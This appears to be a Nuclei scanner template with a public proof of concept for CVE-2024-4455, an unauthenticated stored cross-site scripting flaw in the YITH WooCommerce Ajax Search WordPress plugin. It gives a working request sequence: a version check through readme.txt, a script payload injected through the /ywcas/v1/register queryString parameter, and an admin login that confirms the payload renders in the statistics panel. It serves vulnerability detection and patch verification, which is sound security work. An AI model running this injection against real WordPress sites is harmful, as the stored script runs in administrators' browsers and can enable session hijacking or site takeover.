The YITH WooCommerce Ajax Search plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'queryString' parameter in the REST API endpoint /ywcas/v1/register in versions up to, and including, 2.4.0 due to insufficient input sanitization and output escaping.
PoC代码[已公开]
id: CVE-2024-4455
info:
name: YITH WooCommerce Ajax Search <= 2.4.0 - Cross-Site Scripting
author: Shivam Kamboj
severity: high
description: |
The YITH WooCommerce Ajax Search plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'queryString' parameter in the REST API endpoint /ywcas/v1/register in versions up to, and including, 2.4.0 due to insufficient input sanitization and output escaping.
impact: |
Attackers can execute arbitrary scripts in users' browsers, potentially leading to session hijacking, defacement, or redirection.
remediation: |
Update YITH WooCommerce Ajax Search plugin to version 2.4.1 or later.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2024-4455
- https://www.wordfence.com/threat-intel/vulnerabilities/id/cf0f5fd4-cd06-4d11-9f22-1f417b546afb
- https://patchstack.com/database/vulnerability/yith-woocommerce-ajax-search/wordpress-yith-woocommerce-ajax-search-plugin-2-4-0-unauthenticated-stored-cross-site-scripting-vulnerability
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cve-id: CVE-2024-4455
epss-score: 0.07954
epss-percentile: 0.91784
cwe-id: CWE-79
metadata:
verified: true
max-request: 4
vendor: yithemes
product: yith-woocommerce-ajax-search
framework: wordpress
tags: cve,cve2024,wordpress,wp,wp-plugin,xss,yith,woocommerce,authenticated,vkev
flow: (http(1) && http(2)) || (http(3) && http(4))
http:
- raw:
- |
GET /wp-content/plugins/yith-woocommerce-ajax-search/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- "compare_versions(version, '<= 2.4.0')"
- "contains(body, 'YITH WooCommerce Ajax Search')"
condition: and
internal: true
extractors:
- type: regex
part: body
name: version
group: 1
regex:
- 'Stable tag: ([0-9.]+)'
internal: true
- raw:
- |
GET /?rest_route=/ywcas/v1/register&queryString=<script>alert(document.domain)</script>&totalResults=0 HTTP/1.1
Host: {{Hostname}}
matchers:
- type: regex
part: body
regex:
- '"loggerID":\s*[0-9]+'
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- raw:
- |
GET /wp-admin/admin.php?page=yith_wcas_panel&tab=statistic&from&to&view_all=no_results HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body, "Query\"><script>alert(document.domain)</script>")'
- 'contains(content_type, "text/html")'
- 'status_code == 200'
condition: and
# digest: 4a0a00473045022100e26e925ee27afc40974d038a27ac059de0894fcf1f5d237441b325fd6166651402202a0895d02183ca55d8a8d2f1525f2ed2c1a7bc7756f2141090713b9a564e46b0:922c64590222798bb761d5b6d8e72950